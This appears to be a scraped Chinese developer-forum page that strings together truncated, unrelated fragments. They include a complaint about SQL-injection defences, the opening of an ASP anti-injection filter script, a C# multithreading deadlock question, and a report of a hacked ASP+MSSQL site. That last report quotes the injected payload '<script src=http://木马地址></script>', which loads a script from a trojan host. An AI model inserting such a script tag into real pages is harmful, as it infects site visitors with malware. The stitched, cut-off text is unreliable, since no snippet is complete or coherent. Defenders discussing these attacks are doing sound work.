这世界太可笑了!!!
搜索的全部都不能用,来这里找人解决纺注入的问题,没人能给个好使的防注入代码?
确实可笑,不过不是这个世界
<%
'--------定义部份------------------
Dim Neeao_Application_Value
Dim Neeao_Post,Neeao_Get,Neeao_Inject,Neeao_Inject_Keyword,Neeao_Kill_IP,Neeao_Write_Data
Dim Neeao_Alert_Url,Neeao_Alert_Info,Neeao_Kill_Info,Neeao_Alert_Type
Dim Neeao_Sec_Forms,Neeao_Sec_Form_open,Neeao_Sec_Form
'Call PutApplicationValue()
If IsArray(Application("Neeao_config_info"))=False Then Call PutApplicationValue()
Neeao_Application_Value = Application("Neeao_config_info")
'获取配置信息
Neeao_Inject = Neeao_Application_Value(0)
Neeao_Kill_IP = Neeao_Application_Value(1)
Neeao_Write_Data = Neeao_Application_Value(2)
Neeao_Alert_Url = Neeao_Application_Value(3)
Neeao_Alert_Info = Neeao_Application_Value(4)
Neeao_Kill_Info = Neeao_Application_Value(5)
Neeao_Alert_Type = Neeao_Application_Value(6)
Neeao_Sec_Forms = Neeao_Application_Value(7)
Neeao_Sec_Form_open = Neeao_Application_Value(8)
'安全页面参数
Neeao_Sec_Form = split(Neeao_Sec_Forms,"|")
Neeao_Inject_Keyword = split(Neeao_Inject,"|")
If Neeao_Kill_IP=1 Then Stop_IP
If Request.Form <>"" Then StopInjection(Request.Form)
开三个线程跑下面的这个 Do() 函数就会发生死锁.
开三个线程以上,就根本跑不起来!.
不就是对同一主从表进行增删改操作么.就1000条也会这样,太差了!
C# code:
public void Do()
{
......
现有一个ASP+mssql的网站,被挂马了,将里面一个表中的ntext字段挂马挂马,“<script src=http://木马地址></script>”,的方式是,不断地修改该字段的值,直接加在最后的,时间长了,可以看到该字段中有 ......
